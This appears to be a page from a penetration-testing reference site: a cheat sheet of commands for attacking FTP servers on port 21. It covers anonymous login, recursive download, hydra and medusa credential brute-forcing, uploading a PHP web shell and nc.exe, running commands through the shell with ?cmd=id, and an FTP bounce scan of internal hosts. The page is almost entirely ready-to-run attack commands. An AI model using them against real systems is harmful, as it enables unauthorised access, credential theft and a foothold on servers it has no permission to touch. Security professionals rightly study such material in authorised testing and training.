> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 21 - FTP

> FTP enumeration and exploitation: anonymous login, credential brute-force, file upload, and bounce attacks.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 21 TARGET
```

### Banner Grab

```bash theme={"dark"}
nc -nv TARGET 21
```

***

## Anonymous Login

```bash theme={"dark"}
ftp TARGET
# Username: anonymous
# Password: (empty or any email)
```

```bash theme={"dark"}
ftp -a TARGET
```

### Download Everything

```bash theme={"dark"}
wget -r ftp://anonymous:anonymous@TARGET/
```

***

## Enumeration

### List Files

```bash theme={"dark"}
ftp> ls -la
ftp> dir
```

### Download File

```bash theme={"dark"}
ftp> get file.txt
ftp> mget *.txt
```

### Upload File

```bash theme={"dark"}
ftp> put shell.php
ftp> mput *.txt
```

### Binary Mode (for executables)

```bash theme={"dark"}
ftp> binary
ftp> put nc.exe
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt ftp://TARGET
```

```bash theme={"dark"}
medusa -h TARGET -U users.txt -P passwords.txt -M ftp
```

***

## Interesting Files

Look for:

* `.htpasswd`
* `web.config`
* `backup.zip`
* `*.conf`
* SSH keys
* Database dumps

***

## FTP Bounce Attack

Use FTP server to port scan internal hosts.

```bash theme={"dark"}
nmap -Pn -b anonymous:anonymous@FTP_SERVER INTERNAL_TARGET
```

***

## FTP + Web Shell

If FTP root maps to web root:

```bash theme={"dark"}
ftp> put shell.php
```

Access:

```
http://TARGET/shell.php?cmd=id
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 21 --script ftp-anon TARGET
nmap -p 21 --script ftp-brute TARGET
nmap -p 21 --script ftp-vuln* TARGET
```

***

## Quick Reference

| Check           | Command                                       |
| --------------- | --------------------------------------------- |
| Anonymous login | `ftp -a TARGET`                               |
| Brute-force     | `hydra -L users.txt -P pass.txt ftp://TARGET` |
| Download all    | `wget -r ftp://anonymous:@TARGET/`            |
| Bounce scan     | `nmap -b user:pass@FTP INTERNAL`              |
